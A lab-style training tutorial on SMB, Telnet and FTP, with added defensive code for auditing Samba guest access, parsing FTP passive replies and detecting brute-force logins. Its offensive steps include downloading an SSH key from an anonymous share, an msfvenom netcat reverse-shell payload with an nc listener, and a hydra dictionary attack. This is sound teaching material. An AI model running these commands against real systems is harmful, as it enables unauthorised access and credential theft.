
Blue Team Training Series Part 1

tags: cybersecurity blue team smb telnet ftp hydra

Understanding SMB

Server Message Block protocol is a client-server communication protocol used for sharing access to files, printers, serial ports, and other resources on a network.

SMB is a request-response protocol meaning that it transmits multiple messages between the client and server to establish a connection.

Clients connect to servers using NetBIOS over TCP/IP (RFC 1001 and 1002), NetBEUI (NetBIOS Extended User Interface) or IPX/SPX (Internetwork Packet Exchange / Sequenced Packet Exchange). Modern SMB also runs directly over TCP port 445 without a NetBIOS layer.

Once a connection is established, clients send commands (SMBs) to the server allowing them to access shares, open files, read and write files, or anything else you'd do with a file system.

Microsoft Windows versions from Windows 95 onward ship with SMB support. Samba is the open-source implementation for *nix systems.

Enumerating SMB

Enumeration is the process of gathering information on a target in order to find potential attack vectors and aid in exploitation.

Enumeration is useful for gathering usernames, passwords, network information, host names, application data, services and anything else that is useful to an attacker.

Typically there are SMB shares (shared drives) on a server that can be connected to and used to view or transfer files.

Steps:

  1. Port scanning: using nmap
  2. Enum4linux
     A tool used to enumerate SMB shares on both Windows and Linux systems. It is a wrapper around the tools in the Samba package and makes it easy to quickly extract SMB-related information from the target.
     syntax: enum4linux [options] [ip]

Common shares include:

  • netlogon
  • profiles
  • print$
  • IPC$

At times the easiest way into a system is a security misconfiguration.
For SMB, that could mean exploiting anonymous SMB share access, a common misconfiguration that can expose information leading to a shell.

From our enumeration stage we know:

  • The smb share location
  • The name of an interesting smb share

And the winner is smbclient

Because we are trying to access an SMB share, we need a client to access resources on the server. Let's use smbclient because it's part of the default Samba suite.
syntax: smbclient //[IP]/[SHARE]
followed by the flags:
-U [name]: to specify the user (for anonymous access use: Anonymous)
-p [port]: to specify the port (default is 445)

consider:

  • use the get command to download files while in smbclient
  • in the case of SSH, the private key lives in the user's .ssh directory and is usually named id_rsa
  • get id_rsa (downloads the key)
  • once you figure out the identity of the user, e.g. johndoe, you can ssh into the system using:
    ssh -i id_rsa johndoe@ip
  • then you go from there
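As an added, defender-side example (not code from the page or from Samba), here is a small audit that reads a Samba smb.conf and flags the guest-access settings that make the anonymous share access described above possible. Both sample configs are constructed: one weak, one corrected.

```python
# Added example (not from the page): audit a Samba smb.conf for the guest
# (anonymous) access that enum4linux and smbclient would reveal. The option
# names and synonyms are Samba's own; both sample configs are constructed.
from configparser import ConfigParser

TRUE = {"yes", "true", "1"}

def parse_smb_conf(text):
    """smb.conf is INI-like: [section] headers, '#'/';' comments, 'key = value'."""
    cp = ConfigParser(comment_prefixes=("#", ";"), inline_comment_prefixes=("#", ";"),
                      strict=False, interpolation=None)
    cp.read_string(text)
    return cp

def audit_guest_access(text):
    """Return (section, reason) findings for settings that let an unauthenticated
    client enumerate, read or write a share."""
    cp = parse_smb_conf(text)
    findings = []
    g = cp["global"] if cp.has_section("global") else {}
    if g.get("map to guest", "never").lower() != "never":
        findings.append(("global", "map to guest turns failed logins into guest sessions"))
    for share in cp.sections():
        if share == "global":
            continue
        s = cp[share]
        guest = (s.get("guest ok", s.get("public", "no")).lower() in TRUE
                 or s.get("guest only", "no").lower() in TRUE)
        if not guest:
            continue
        # Samba defaults to read only; either spelling of writable overrides it.
        writable = (s.get("writable", s.get("writeable", "no")).lower() in TRUE
                    or s.get("read only", "yes").lower() not in TRUE)
        findings.append((share, "writable guest share" if writable else "read-only guest share"))
    return findings

# Weak config (constructed): unknown users become guest, two shares are open to them.
WEAK_CONF = """
[global]
map to guest = bad user
[profiles]
guest ok = yes
writable = yes
[print$]
public = yes
read only = yes
"""
# Hardened config: guest mapping off, every share requires authentication.
HARDENED_CONF = (WEAK_CONF.replace("bad user", "never")
                 .replace("guest ok = yes", "guest ok = no").replace("public = yes", "public = no"))
```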

Understanding Telnet

Telnet is an application protocol that lets you, through a telnet client, connect to and issue commands on a remote machine running a telnet server.

The telnet client will establish a connection with the server.

The client then becomes a virtual terminal allowing you to interact with the remote host.

Since Telnet sends everything in clear text and has no security mechanisms of its own, SSH has replaced it.
syntax: telnet [ip] [port]

Vulnerabilities that could potentially be trivial to exploit do not always jump out at us. Therefore, we need to be thorough in our methodology.

You can check for telnet's CVEs at:
cvedetails.com
cve.mitre.org

A CVE (Common Vulnerabilities and Exposures) is a list of publicly disclosed computer security flaws.

Keep in mind that you are far more likely to find a misconfiguration in how Telnet has been set up or is operating that will allow you to exploit it.

The name is shell... Reverse shell

  • A shell is a piece of code / program that can be used to gain code execution or command execution on a device.
  • A reverse shell is a type of shell in which the target machine communicates back to the attacking machine.
  • The attacking machine has a listening port on which it receives the connection, resulting in code or command execution being achieved.

listen and listen good with tcp

  • start a tcpdump listener on your local machine with
    syntax: tcpdump ip proto \icmp -i tun0
    note that 'ip' here is literally the keyword ip, not an address, and the backslash escapes icmp, which is otherwise a filter keyword
  • this captures ICMP traffic reaching your machine, so you can see the effect of commands run from the telnet session

Get that payday with that msfvenom payload

This will generate and encode a netcat reverse shell.
syntax: msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R

  • -p: payload
  • lhost: our local host IP address
  • lport: the port to listen on
  • R: export the payload in raw format

start a netcat listener on our local machine
syntax: nc -lvp [listening port]

Once you're listening, copy and paste the payload into the telnet terminal and you have a reverse shell :-)

Understanding FTP

File Transfer Protocol (FTP) is used to transfer files remotely over a network.
It uses a client-server model and relays data and commands efficiently.
A typical FTP session operates over two channels:

  • a command channel, sometimes called the control channel
  • a data channel

The command channel is for transmitting commands as well as replies to said commands.
The data channel is for transmitting data.

FTP operates using a client-server protocol.
The client initiates a connection with the server, the server validates whatever login credentials are provided and then opens the session.
While the session is open, the client may execute commands on the server.

Servers support active connections, passive connections, or both.

Active FTP: the client opens a port and listens; the server is required to actively connect to it.
Passive FTP: the server opens a port and listens passively; the client connects to it.

The separation of command and data channels allows commands to be sent to the server without waiting for a data transfer to finish.
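As an added example (not code from the page), here is the client-side arithmetic behind the two modes just described: decoding the server's passive-mode 227 reply into a data endpoint, and building the active-mode PORT command. The 227 reply text is constructed; keeping the control-connection address when the advertised PASV address differs is a common client hardening rule assumed here, not something the page states.

```python
# Added example (not from the page): FTP passive/active data-channel endpoints.
import re

# Hosts and ports travel as six decimal bytes: h1,h2,h3,h4,p1,p2.
PASV_RE = re.compile(r"\((\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\)")

def parse_pasv_reply(reply):
    """'227 Entering Passive Mode (10,10,10,6,4,1)' -> ('10.10.10.6', 1025)."""
    if not reply.startswith("227"):
        raise ValueError(f"not a PASV reply: {reply!r}")
    m = PASV_RE.search(reply)
    if m is None:
        raise ValueError("reply carries no (h1,h2,h3,h4,p1,p2) tuple")
    n = [int(x) for x in m.groups()]
    if any(b > 255 for b in n):
        raise ValueError("octet out of range")
    port = n[4] * 256 + n[5]          # high byte first, then low byte
    if port == 0:
        raise ValueError("port 0 is not a usable data port")
    return ".".join(map(str, n[:4])), port

def passive_data_endpoint(reply, control_peer):
    """Choose where to open the data channel. A server that advertises a host
    other than the one on the control channel is treated as misconfigured or
    hostile (assumed hardening rule): keep the control peer, trust only the port."""
    host, port = parse_pasv_reply(reply)
    return (host if host == control_peer else control_peer), port

def build_port_command(host, port):
    """Active mode: tell the server which client address:port to connect back to."""
    octets = host.split(".")
    if len(octets) != 4 or not all(o.isdigit() and int(o) <= 255 for o in octets):
        raise ValueError(f"bad IPv4 address: {host!r}")
    if not 1 <= port <= 65535:
        raise ValueError("port out of range")
    return f"PORT {','.join(octets)},{port // 256},{port % 256}"
```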

Exploiting anonymous FTP login to see what files we can access, and whether the information can lead to a shell, is a common CTF method and mimics a real-life careless FTP server deployment.

A common legacy exploit utilising in.ftpd can be found here: Solaris 2.6/7.0 - IN.FTPD CWD 'Username' Enumeration.

To check for anonymous FTP login:
syntax: ftp [ip], then enter anonymous as the username and leave the password empty when prompted.

Exploiting FTP

When using FTP, both the command and data channels are unencrypted.
Data sent over these channels can be intercepted and read.
You could use ARP-Poisoning to trick a victim into sending sensitive information to an attacker instead of a legitimate source. See related article here.

Enter HYDRA

Hydra is a very fast online password cracking tool which can perform rapid dictionary attacks against more than 50 protocols, including Telnet, RDP, SSH, FTP, HTTP, SMB, several databases and more.

syntax: hydra -t 4 -l naruto -P /usr/share/wordlists/rockyou.txt -vV 10.10.10.6 ftp

  • hydra: runs hydra
  • -t 4: number of parallel connections per target
  • -l [user]: the user whose account you are trying to compromise
  • -P [path to dictionary]: the file containing the list of candidate passwords
  • -vV: verbose output that shows each login attempt
  • [machine ip]: the IP address of the target machine
  • ftp: the protocol to attack (here FTP)
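As an added, defender-side example (not code from the page or from Hydra), here is the detection logic that catches a dictionary attack like the one above: count failed FTP logins per client in a sliding window and flag a later successful login from a flagged client. The lines follow vsftpd's vsftpd.log layout; the sample log, the attacker address and the thresholds are constructed.

```python
# Added example (not from the page): flag the kind of online dictionary attack
# hydra runs against FTP by counting failed logins per client in a sliding
# window. Lines follow vsftpd's vsftpd.log layout; the sample log is constructed.
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LINE_RE = re.compile(r'^(?P<ts>\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
                     r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"')

def parse_line(line):
    """Return (timestamp, user, 'OK'|'FAIL', client ip), or None for other lines."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    return datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y"), m["user"], m["result"], m["ip"]

def detect_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Return alerts as (ip, kind, iso timestamp). 'bruteforce' fires once when a
    client reaches `threshold` failures inside `window`; 'compromise' fires on an
    OK LOGIN from a client already flagged, i.e. the wordlist contained the password."""
    fails = defaultdict(deque)
    flagged = set()
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue                     # vsftpd also logs transfers; ignore those
        ts, _user, result, ip = rec
        if result == "FAIL":
            q = fails[ip]
            q.append(ts)
            while ts - q[0] > window:    # drop failures older than the window
                q.popleft()
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append((ip, "bruteforce", ts.isoformat()))
        elif ip in flagged:
            alerts.append((ip, "compromise", ts.isoformat()))
    return alerts

# Constructed sample: 12 failures in 12 seconds against the page's user, then a hit,
# plus an unrelated anonymous login from another client that must not alert.
SAMPLE_LOG = [
    f'Tue Mar 12 10:00:{i:02d} 2024 [pid {300 + i}] [naruto] FAIL LOGIN: Client "10.10.14.5"'
    for i in range(12)
] + [
    'Tue Mar 12 10:00:13 2024 [pid 312] [naruto] OK LOGIN: Client "10.10.14.5"',
    'Tue Mar 12 10:00:14 2024 [pid 313] [anonymous] OK LOGIN: Client "10.10.10.9"',
]
```

Hydra's -t 4 keeps four connections open at once, so the failures arrive in bursts; the window-based count catches that regardless of how the attempts are spread across connections.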

You can read more about exploitation of remote services here